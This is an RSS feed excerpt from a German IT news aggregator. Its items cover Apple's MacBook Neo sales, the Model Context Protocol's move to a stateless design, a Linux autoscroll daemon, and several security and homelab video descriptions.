<p class="wp-block-paragraph">In the immediate future, as competitors raise prices on the PCs that compete with Apple’s lower-cost device, Cupertino is <a href="https://www.culpium.com/p/apple-in-talks-to-boost-mac-neo-production" target="_blank" rel="noreferrer noopener">already plotting</a> the path toward <a href="https://www.bloomberg.com/news/articles/2026-07-22/apple-to-launch-new-macbook-air-imac-macbook-pro-neo-mac-mini-mac-studio" target="_blank" rel="noreferrer noopener">MacBook Neo 2.</a> Reports claim this will debut in March in new colors and use the A19 Pro chip from the iPhone 17 Pro, with performance boosted by slightly more unified memory (12GB, rather than 8GB). That’ll make it a much better Mac, likely with 10-15% performance gains and the ability to run Apple Intelligence, making it the best and most affordable AI PC in its class.</p>



<p class="wp-block-paragraph">Just four months after the Neo’s rollout, Apple is already in position to leak rumors of an even more computationally capable follow-up, while competitors struggle to compete with the original on performance, build quality, and price. Still, the Neo might get more expensive, reporting warns, with the lowest-price 256GB model now gone, making the $599 Mac a mirage we can only wistfully hope to see again. </p>



<p class="wp-block-paragraph">That might matter less in context, as PC makers everywhere boost prices while RAM, chips, and storage prices head north, along with transport, logistics, and energy costs. “While [Apple] did raise prices in line with the broader market, it still remains well positioned against rivals facing the same cost pressures,” said Jean Philippe Bouchard, vice president for consumer devices at IDC. </p>



<p class="wp-block-paragraph">“As market conditions continue to worsen, the importance of supply chain management and capabilities are increasingly important,” Bouchard said. “The largest vendors, with their buying power and long-standing supplier ties, are best positioned to take share from smaller rivals.”</p>



<h2 class="wp-block-heading"><strong>This was never about luck</strong></h2>



<p class="wp-block-paragraph">This isn’t solely a market take about competition, it’s about planning.</p>



<p class="wp-block-paragraph">Few in the industry seemed prepared for the massive memory price increases that hit this year. Apple clearly planned its low-cost Mac well before that happened, hoping to seize the PC market at the low-mid-range. This is precisely what it seems to have done, what it continues to do, and what it will continue to do.</p>



<p class="wp-block-paragraph">The recent reports that it has a successor planned shows the breadth of the Mac company’s strategic vision, as Apple has quite clearly sought to fully exploit the failings of Windows and the internal contradictions of a value-conscious industry in stiff competition with itself.</p>



<p class="wp-block-paragraph">With the first M-series Macs about to enter the replacement cycle, Apple has built a market it can capitalize on for at least a decade, meaning it already has a vision for PC sales that extends at least as far. That’s the kind of road map corporate purchasers want when they make platform deployment decisions, which is why Apple’s 10% share gains are the beginning of <a href="https://www.computerworld.com/article/4150717/hexnode-ceo-macbook-neo-forces-it-to-rethink-its-budget-laptop-strategy.html">even more significant market change</a>. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Stories | Where Cybersecurity Professionals Go to Learn]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 0x - Views:6 Why do cybersecurity professionals keep coming back to Black Hat? Gaurav Keerthi, CEO and founder of StrongKeep shares why learning happens everywhere, from the stage to the conversations in between.]]></description>
<link>https://tsecurity.de/de/3692502/it-security-video/black-hat-stories-where-cybersecurity-professionals-go-to-learn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692502/it-security-video/black-hat-stories-where-cybersecurity-professionals-go-to-learn/</guid>
<pubDate>Fri, 24 Jul 2026 22:52:16 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 0x - Views:6 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/j8LuOv0VYoA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Why do cybersecurity professionals keep coming back to Black Hat? Gaurav Keerthi, CEO and founder of StrongKeep shares why learning happens everywhere, from the stage to the conversations in between.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Model Context Protocol is going stateless to make scaling simpler]]></title>
<description><![CDATA[Model Context Protocol (MCP), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.



The latest release candidate, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless arch...]]></description>
<link>https://tsecurity.de/de/3691919/ai-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691919/ai-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</guid>
<pubDate>Fri, 24 Jul 2026 17:40:37 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a>), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.</p>



<p class="wp-block-paragraph">The latest <a href="https://modelcontextprotocol.io/specification/draft/changelog" target="_blank" rel="noreferrer noopener">release candidate</a>, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless architecture, a change which industry experts say is intended to make MCP easier to deploy across standard cloud infrastructure as enterprises move AI pilots into production.</p>



<p class="wp-block-paragraph">“The session-based model made sense when MCP servers were local processes on a developer’s laptop. In production, it became an operational tax,” said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at ZopDev.</p>



<p class="wp-block-paragraph">“When your infrastructure team asks whether MCP services can scale like other cloud applications, the answer used to be ‘not quite.’ With the move to a stateless architecture, the answer is now yes,” Bandta added.</p>



<p class="wp-block-paragraph">Earlier versions of the protocol maintained information about every client connection, meaning servers had to keep track of each session throughout an interaction. While that approach worked well for local development, it complicated deployments across multiple servers because requests often had to be routed back to the same machine, limiting scalability and making MCP a less natural fit for modern cloud architectures.</p>



<p class="wp-block-paragraph">“Under the new stateless design, every request contains the information needed for any available server to process it independently. Applications that need to maintain context across multiple requests can still do so, but developers must now manage that state explicitly rather than relying on the protocol itself,” she said.</p>



<p class="wp-block-paragraph">This transition to a stateless design goes beyond simplifying infrastructure by fundamentally changing how AI applications manage and share context across tools, according to <a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">Instead of keeping application state hidden inside protocol sessions, the new design makes it explicit, allowing AI models to access, reason over, and pass that information between tools, giving developers greater control over how context is preserved and shared across tools, Jena said.</p>



<p class="wp-block-paragraph">It should also make AI workflows more portable, resilient, and easier to orchestrate across distributed environments, he said.</p>



<h2 class="wp-block-heading">MCP’s new features</h2>



<p class="wp-block-paragraph">Other changes to MCP include the addition of a Multi Round-Trip Requests (MRTR) mechanism that changes how AI agents request additional information they need to complete a task.</p>



<p class="wp-block-paragraph">Instead of relying on a persistent connection between the client and server throughout the interaction, the new mechanism lets the server request additional input through a standard request-response exchange before continuing the task, Jena said.</p>



<p class="wp-block-paragraph">Routable transport headers, another addition, enable API gateways and other networking infrastructure to identify and route MCP requests without inspecting their contents.</p>



<p class="wp-block-paragraph">They reduce processing overhead, lower latency, and let enterprise teams enforce routing, rate-limiting and security policies more efficiently using existing API management infrastructure, Jena said.</p>



<p class="wp-block-paragraph">MCP is also getting an updated authorization framework built around OAuth 2.1 and OpenID Connect; interactive MCP Apps; and deterministic caching of tool and resource listings to improve LLM prompt-cache hit rates, potentially saving on token costs.</p>



<h2 class="wp-block-heading">Rebuilding the trust boundary</h2>



<p class="wp-block-paragraph">The MCP release steering committee also decided to deprecate some legacy features, including Roots, Sampling, Logging, the older HTTP+SSE transport and Dynamic Client Registration, although these will continue to work in this version and any other released over the next year.</p>



<p class="wp-block-paragraph">The deprecation of Sampling is likely to have the biggest impact because it changes who is responsible for interacting with foundation models, said Jena.</p>



<p class="wp-block-paragraph">“Sampling let MCP servers invoke the <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" target="_blank">LLM</a> through the client, which meant the server had a callback path into the model without owning that connection. Deprecating it means rebuilding that trust boundary,” Jena said. “Your server now calls the model provider directly. That changes your network architecture, your auth model, and depending on how you’ve built cost attribution, your billing flow.”</p>



<p class="wp-block-paragraph">The year-long transition period will be enough for teams to audit their sampling dependencies now, said Jena: “The risk is that teams who haven’t implemented sampling themselves won’t know if a third-party MCP server they’re depending on uses it.”</p>



<h2 class="wp-block-heading">Updated MCP SDKs</h2>



<p class="wp-block-paragraph">To accompany the protocol update, there are updated <a href="https://github.com/modelcontextprotocol" target="_blank" rel="noreferrer noopener">MCP SDKs</a> for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html" target="_blank">Python</a>, <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" target="_blank">Typescript</a>, <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go</a>, and <a href="https://www.infoworld.com/article/4131649/the-best-new-features-of-c-14.html">C#</a>. These support both the old and new protocol versions, so new clients can continue communicating with older servers, while updated servers will also support older clients, reducing the risk of immediate disruptions.</p>



<p class="wp-block-paragraph">That backward compatibility should make the transition largely incremental, except for enterprises that built custom infrastructure around MCP’s earlier session-based architecture, Bandta said.</p>



<p class="wp-block-paragraph">Identifying and auditing those session dependencies may not be easy, Jena warned.</p>



<p class="wp-block-paragraph">“Session management complexity tends to be hidden across multiple layers — the gateway config, the deployment scripts, the monitoring dashboards. The code change is small; finding everywhere the assumption lives is what takes time,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Model Context Protocol is going stateless to make scaling simpler]]></title>
<description><![CDATA[Model Context Protocol (MCP), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.



The latest release candidate, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless arch...]]></description>
<link>https://tsecurity.de/de/3691907/it-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691907/it-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</guid>
<pubDate>Fri, 24 Jul 2026 17:38:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a>), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.</p>



<p class="wp-block-paragraph">The latest <a href="https://modelcontextprotocol.io/specification/draft/changelog" target="_blank" rel="noreferrer noopener">release candidate</a>, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless architecture, a change which industry experts say is intended to make MCP easier to deploy across standard cloud infrastructure as enterprises move AI pilots into production.</p>



<p class="wp-block-paragraph">“The session-based model made sense when MCP servers were local processes on a developer’s laptop. In production, it became an operational tax,” said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at ZopDev.</p>



<p class="wp-block-paragraph">“When your infrastructure team asks whether MCP services can scale like other cloud applications, the answer used to be ‘not quite.’ With the move to a stateless architecture, the answer is now yes,” Bandta added.</p>



<p class="wp-block-paragraph">Earlier versions of the protocol maintained information about every client connection, meaning servers had to keep track of each session throughout an interaction. While that approach worked well for local development, it complicated deployments across multiple servers because requests often had to be routed back to the same machine, limiting scalability and making MCP a less natural fit for modern cloud architectures.</p>



<p class="wp-block-paragraph">“Under the new stateless design, every request contains the information needed for any available server to process it independently. Applications that need to maintain context across multiple requests can still do so, but developers must now manage that state explicitly rather than relying on the protocol itself,” she said.</p>



<p class="wp-block-paragraph">This transition to a stateless design goes beyond simplifying infrastructure by fundamentally changing how AI applications manage and share context across tools, according to <a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">Instead of keeping application state hidden inside protocol sessions, the new design makes it explicit, allowing AI models to access, reason over, and pass that information between tools, giving developers greater control over how context is preserved and shared across tools, Jena said.</p>



<p class="wp-block-paragraph">It should also make AI workflows more portable, resilient, and easier to orchestrate across distributed environments, he said.</p>



<h2 class="wp-block-heading">MCP’s new features</h2>



<p class="wp-block-paragraph">Other changes to MCP include the addition of a Multi Round-Trip Requests (MRTR) mechanism that changes how AI agents request additional information they need to complete a task.</p>



<p class="wp-block-paragraph">Instead of relying on a persistent connection between the client and server throughout the interaction, the new mechanism lets the server request additional input through a standard request-response exchange before continuing the task, Jena said.</p>



<p class="wp-block-paragraph">Routable transport headers, another addition, enable API gateways and other networking infrastructure to identify and route MCP requests without inspecting their contents.</p>



<p class="wp-block-paragraph">They reduce processing overhead, lower latency, and let enterprise teams enforce routing, rate-limiting and security policies more efficiently using existing API management infrastructure, Jena said.</p>



<p class="wp-block-paragraph">MCP is also getting an updated authorization framework built around OAuth 2.1 and OpenID Connect; interactive MCP Apps; and deterministic caching of tool and resource listings to improve LLM prompt-cache hit rates, potentially saving on token costs.</p>



<h2 class="wp-block-heading">Rebuilding the trust boundary</h2>



<p class="wp-block-paragraph">The MCP release steering committee also decided to deprecate some legacy features, including Roots, Sampling, Logging, the older HTTP+SSE transport and Dynamic Client Registration, although these will continue to work in this version and any other released over the next year.</p>



<p class="wp-block-paragraph">The deprecation of Sampling is likely to have the biggest impact because it changes who is responsible for interacting with foundation models, said Jena.</p>



<p class="wp-block-paragraph">“Sampling let MCP servers invoke the <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" target="_blank">LLM</a> through the client, which meant the server had a callback path into the model without owning that connection. Deprecating it means rebuilding that trust boundary,” Jena said. “Your server now calls the model provider directly. That changes your network architecture, your auth model, and depending on how you’ve built cost attribution, your billing flow.”</p>



<p class="wp-block-paragraph">The year-long transition period will be enough for teams to audit their sampling dependencies now, said Jena: “The risk is that teams who haven’t implemented sampling themselves won’t know if a third-party MCP server they’re depending on uses it.”</p>



<h2 class="wp-block-heading">Updated MCP SDKs</h2>



<p class="wp-block-paragraph">To accompany the protocol update, there are updated <a href="https://github.com/modelcontextprotocol" target="_blank" rel="noreferrer noopener">MCP SDKs</a> for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html" target="_blank">Python</a>, <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" target="_blank">Typescript</a>, <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go</a>, and <a href="https://www.infoworld.com/article/4131649/the-best-new-features-of-c-14.html">C#</a>. These support both the old and new protocol versions, so new clients can continue communicating with older servers, while updated servers will also support older clients, reducing the risk of immediate disruptions.</p>



<p class="wp-block-paragraph">That backward compatibility should make the transition largely incremental, except for enterprises that built custom infrastructure around MCP’s earlier session-based architecture, Bandta said.</p>



<p class="wp-block-paragraph">Identifying and auditing those session dependencies may not be easy, Jena warned.</p>



<p class="wp-block-paragraph">“Session management complexity tends to be hidden across multiple layers — the gateway config, the deployment scripts, the monitoring dashboards. The code change is small; finding everywhere the assumption lives is what takes time,” he said.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4201254/model-context-protocol-is-going-stateless-to-make-scaling-simpler.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[midscroll: Windows-style middle-click autoscroll for Linux, implemented at the evdev layer so it works in every app on Wayland and X11]]></title>
<description><![CDATA[Windows has middle-click drag autoscroll. On Linux you get it in Firefox, and Chromium has it behind a flag, but nowhere else, which bugged me enough to write a daemon for it. Hold middle-click and drag, page scrolls that way, faster the further you drag. Release to stop. A plain middle click sti...]]></description>
<link>https://tsecurity.de/de/3690946/linux-tipps/midscroll-windows-style-middle-click-autoscroll-for-linux-implemented-at-the-evdev-layer-so-it-works-in-every-app-on-wayland-and-x11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690946/linux-tipps/midscroll-windows-style-middle-click-autoscroll-for-linux-implemented-at-the-evdev-layer-so-it-works-in-every-app-on-wayland-and-x11/</guid>
<pubDate>Fri, 24 Jul 2026 10:02:54 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Windows has middle-click drag autoscroll. On Linux you get it in Firefox, and Chromium has it behind a flag, but nowhere else, which bugged me enough to write a daemon for it.</p> <p>Hold middle-click and drag, page scrolls that way, faster the further you drag. Release to stop. A plain middle click still pastes and opens links like normal. Diagonal drags do both axes. There's a toggle mode too if you'd rather click once to start it instead of holding.</p> <p>It works everywhere because it sits at the kernel input layer instead of hooking a toolkit. Grabs each mouse via evdev, re-emits through a per-mouse uinput mirror, injects wheel events during a drag. Nothing above it has to cooperate, so Wayland and X11 both just work. Mirrors copy the source mouse's name and IDs so libinput keeps your per-device pointer speed.</p> <p>Speed curve is Chromium's actual Windows autoscroll formula, 0.000008 * distance^2.2 px/ms. Tiny drags crawl, big ones fly. Tunable in a config file or a GTK settings window.</p> <p>Fair warning that it reads every mouse as root, so read it before you run it. It's two small Python files. The systemd unit is sandboxed and I left comments on why the directives I couldn't use would break it.</p> <p>Badge only shows on KDE Wayland, no flatpak, toggle mode kills middle-click paste. Rest is in the readme.</p> <p>FOSS under Unlicense</p> <p><a href="https://github.com/gnhen/midscroll">https://github.com/gnhen/midscroll</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/gnh999"> /u/gnh999 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v503xk/midscroll_windowsstyle_middleclick_autoscroll_for/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v503xk/midscroll_windowsstyle_middleclick_autoscroll_for/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[the PERFECT Raspberry Pi wall dashboard?]]></title>
<description><![CDATA[Author: NetworkChuck - Bewertung: 319x - Views:3894 This video is sponsored by NetworkChuck Coffee. Grab a bag of Default Route (my favorite) and fuel your next build: https://ntck.co/coffee

Raspberry Pi sent me the new Raspberry Pi Touch Display 2, the 10 inch portrait version, and I mounted it...]]></description>
<link>https://tsecurity.de/de/3690019/it-security-video/the-perfect-raspberry-pi-wall-dashboard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690019/it-security-video/the-perfect-raspberry-pi-wall-dashboard/</guid>
<pubDate>Thu, 23 Jul 2026 20:49:01 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: NetworkChuck - Bewertung: 319x - Views:3894 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/34D1imLordU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This video is sponsored by NetworkChuck Coffee. Grab a bag of Default Route (my favorite) and fuel your next build: https://ntck.co/coffee<br />
<br />
Raspberry Pi sent me the new Raspberry Pi Touch Display 2, the 10 inch portrait version, and I mounted it on my studio wall to run all my Home Assistant and homelab stuff. It is a gorgeous little screen (1200x1920, real IPS, 10 finger touch, 400 nits) and at $80 it is a steal. There is one catch though, and a lot of you are not going to like it: this thing only works on the Raspberry Pi 5 and the Compute Modules. Your Pi 3 or Pi 4 will not work at all.<br />
<br />
In this video I unbox it, walk through everything that is new versus the old touch display, hit a wall when it powered on and did absolutely nothing (turns out you have to update the firmware on your Pi 5, the EEPROM, before it will recognize the screen), mount it with nothing but a drill and some screws, and finally turn it into a beautiful Home Assistant dashboard using an open source kiosk app called TouchKio. Whether you are building a smart home wall panel, a homelab status board, or you just want your Raspberry Pi to show off what it is doing, this is a really good option.<br />
<br />
Join the NetworkChuck Academy!: https://ntck.co/NCAcademy<br />
<br />
RESOURCES / LINKS:<br />
🌐 Raspberry Pi Touch Display 2: https://www.raspberrypi.com/products/touch-display-2/<br />
🛠️ TouchKio (open source kiosk app): https://github.com/leukipp/touchkio<br />
🏠 Home Assistant: https://www.home-assistant.io/<br />
🖥️ Proxmox: https://www.proxmox.com/<br />
📖 Update your Raspberry Pi firmware (EEPROM): https://www.raspberrypi.com/documentation/computers/raspberry-pi.html<br />
☕ NetworkChuck Coffee (Default Route): https://ntck.co/coffee<br />
<br />
TIMESTAMPS:<br />
0:00 - Unboxing the new Raspberry Pi Touch Display 2<br />
0:45 - What is new on the 10 inch portrait display<br />
1:50 - The catch: Raspberry Pi 5 and Compute Modules only<br />
2:48 - It powered on and nothing happened<br />
3:16 - The fix: updating your Raspberry Pi 5 firmware<br />
5:55 - Building the Home Assistant dashboard with TouchKio<br />
<br />
**Raspberry Pi provided the Touch Display 2 for this video, no strings attached. All opinions are my own.<br />
<br />
SUPPORT NETWORKCHUCK:<br />
☕☕ COFFEE and MERCH: https://ntck.co/coffee<br />
<br />
READY TO LEARN??<br />
🔥🔥Join the NetworkChuck Academy!: https://ntck.co/NCAcademy<br />
📚 CCNA Course: https://ntck.co/ccna<br />
<br />
FOLLOW ME EVERYWHERE:<br />
Instagram: https://www.instagram.com/networkchuck/<br />
X/Twitter: https://x.com/networkchuck<br />
Facebook: https://www.facebook.com/NetworkChuck/<br />
Join the Discord server: https://ntck.co/discord<br />
<br />
Some links in this description are affiliate links. If you buy through them, I may earn a small commission at no extra cost to you.<br />
<br />
#raspberrypi #homeassistant #homelab<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Logging Every Employee Keystroke | Threat Wire]]></title>
<description><![CDATA[Author: Hak5 - Bewertung: 10x - Views:88 ⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️


@endingwithali →
Twitch: https://twitch.tv/endingwithali
Twitter: https://twitter.com/endingwithali
YouTube: https://youtube.com/@endingwithali
Everywhere else: https://links.ali.dev

Want to work with Ali? ...]]></description>
<link>https://tsecurity.de/de/3689218/it-security-video/meta-logging-every-employee-keystroke-threat-wire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689218/it-security-video/meta-logging-every-employee-keystroke-threat-wire/</guid>
<pubDate>Thu, 23 Jul 2026 15:35:16 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Hak5 - Bewertung: 10x - Views:88 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/WHMXBYddQEw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️<br />
<br />
<br />
@endingwithali →<br />
Twitch: https://twitch.tv/endingwithali<br />
Twitter: https://twitter.com/endingwithali<br />
YouTube: https://youtube.com/@endingwithali<br />
Everywhere else: https://links.ali.dev<br />
<br />
Want to work with Ali? hak5@endingwithali.com<br />
<br />
[❗] Join the Patreon→ https://patreon.com/threatwire<br />
0:00 0 - Intro<br />
1 - Linux AI Security Response<br />
2 - GitHub Is Overwhelmed<br />
3 - Meta’s Bad AI<br />
4 - BSides News<br />
5 - Outro<br />
<br />
LINKS<br />
🔗 Story 1: Linux AI Security Response<br />
https://linuxsecurity.com/news/security-projects/akrites-vulnerability-response<br />
https://www.linuxfoundation.org/press/linux-foundation-and-industry-leaders-launch-akrites-to-defend-critical-open-source-software-against-ai-enabled-cyber-threats<br />
🔗 Story 2: GitHub Is Overwhelmed<br />
https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos/<br />
https://cybersecuritynews.com/gitlost-vulnerability-github/<br />
https://thehackernews.com/2026/07/dormant-github-accounts-help-attackers.html<br />
https://securitylabs.datadoghq.com/articles/coordinated-github-api-enumeration/<br />
https://thehackernews.com/2026/07/public-github-issue-could-trick-github.html<br />
🔗 Story 3: Meta’s Bad AI<br />
https://www.wired.com/story/meta-pauses-employee-tracking-program-following-internal-security-breach/<br />
https://www.wired.com/story/meta-accidentally-let-employees-access-each-others-keystroke-data/<br />
https://thehackernews.com/2026/07/metas-new-ai-image-tool-lets-others-use.html<br />
https://cybernews.com/news/meta-pulls-controversial-ai-image-tool/<br />
https://about.fb.com/news/2026/07/introducing-muse-image-meta-ai/<br />
🔗 Story 4: BSides News<br />
https://cybernews.com/news/apple-openai-lawsuit/<br />
https://cybernews.com/tech/mamdami-click-to-cancel/<br />
-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆<br />
Our Site → https://www.hak5.org<br />
Shop →  http://hakshop.myshopify.com/<br />
Community → https://www.hak5.org/community<br />
Subscribe → https://www.youtube.com/user/Hak5Darren?sub_confirmation=1<br />
Support → https://www.patreon.com/threatwire<br />
Contact Us → http://www.twitter.com/hak5<br />
____________________________________________<br />
<br />
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacBook Neo’s success wasn’t luck, it was a plan]]></title>
<description><![CDATA[It’s difficult to ignore the fact that Apple seems to have turned its MacBook Neo into a weapon to promote platform growth, with enough performance under the hood to make competitors seem inferior.



And even as the PC industry moves to try to compete with Apple’s last huge Mac success, the comp...]]></description>
<link>https://tsecurity.de/de/3689195/ai-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689195/ai-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</guid>
<pubDate>Thu, 23 Jul 2026 15:22:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It’s difficult to ignore the fact that Apple seems to have <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html">turned its MacBook Neo into a weapon</a> to promote platform growth, with enough performance under the hood to make competitors seem inferior.</p>



<p class="wp-block-paragraph">And even as the PC industry moves to try to compete with Apple’s last <a href="https://www.applemust.com/macbook-neo-continues-to-top-amazon-laptop-charts-in-us-uk/" target="_blank" rel="noreferrer noopener">huge Mac success</a>, the company is already planning a powerful follow-up.</p>



<p class="wp-block-paragraph">That points to the discipline Apple has applied to the Mac since the introduction of Apple Silicon. The company has built a clear product roadmap, strong entry-level pricing, and steady performance gains. This focus is now paying dividends, giving people the impetus to keep placing their trust in Apple and its Macs — even as the industry raises prices in the face of RAMageddon and price increases. </p>



<h2 class="wp-block-heading"><strong>The numbers don’t lie</strong></h2>



<p class="wp-block-paragraph">“Apple’s recent price increase seems to be an inevitable response to these cost increases. In the second half of the year, other PC OEMs are expected to continue to raise prices, and the overall ASP increase is expected to continue,” Counterpoint said. The researcher tells us global PC shipments shrank 4% in the second quarter of 2026 as rising costs hit demand. The Mac maker, by contrast, moved in the opposite direction, generating 13% growth in the quarter — mainly on the back of the MacBook Neo introduction. </p>



<p class="wp-block-paragraph"><a href="https://www.idc.com/resource-center/press-releases/2q26-pc-top5/" target="_blank">Recent IDC data</a> gives Apple 10.1% year-over-year growth and just under 10% (9.9% to be exact) of the worldwide PC market, even as the overall market declined 4.9%.</p>



<p class="wp-block-paragraph">“With emerging supply chain and tariff challenges inflating memory prices…, Apple’s incredibly aggressive price-point for the MacBook Neo makes its release feel all the more like a gut punch to one of the PC market’s most valuable price tiers,” Futurum Research Director <a href="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html" data-type="link" data-id="https://www.computerworld.com/article/4143010/apples-macbook-neo-first-reviews-and-analyst-reactions.html">Olivier Blanchard said when the Neo was released</a>. </p>



<h2 class="wp-block-heading"><strong>Neo 2.0 is already coming</strong></h2>



<p class="wp-block-paragraph">In the immediate future, as competitors raise prices on the PCs that compete with Apple’s lower-cost device, Cupertino is <a href="https://www.culpium.com/p/apple-in-talks-to-boost-mac-neo-production" target="_blank" rel="noreferrer noopener">already plotting</a> the path toward <a href="https://www.bloomberg.com/news/articles/2026-07-22/apple-to-launch-new-macbook-air-imac-macbook-pro-neo-mac-mini-mac-studio" target="_blank" rel="noreferrer noopener">MacBook Neo 2.</a> Reports claim this will debut in March in new colors and use the A19 Pro chip from the iPhone 17 Pro, with performance boosted by slightly more unified memory (12GB, rather than 8GB). That’ll make it a much better Mac, likely with 10-15% performance gains and the ability to run Apple Intelligence, making it the best and most affordable AI PC in its class.</p>



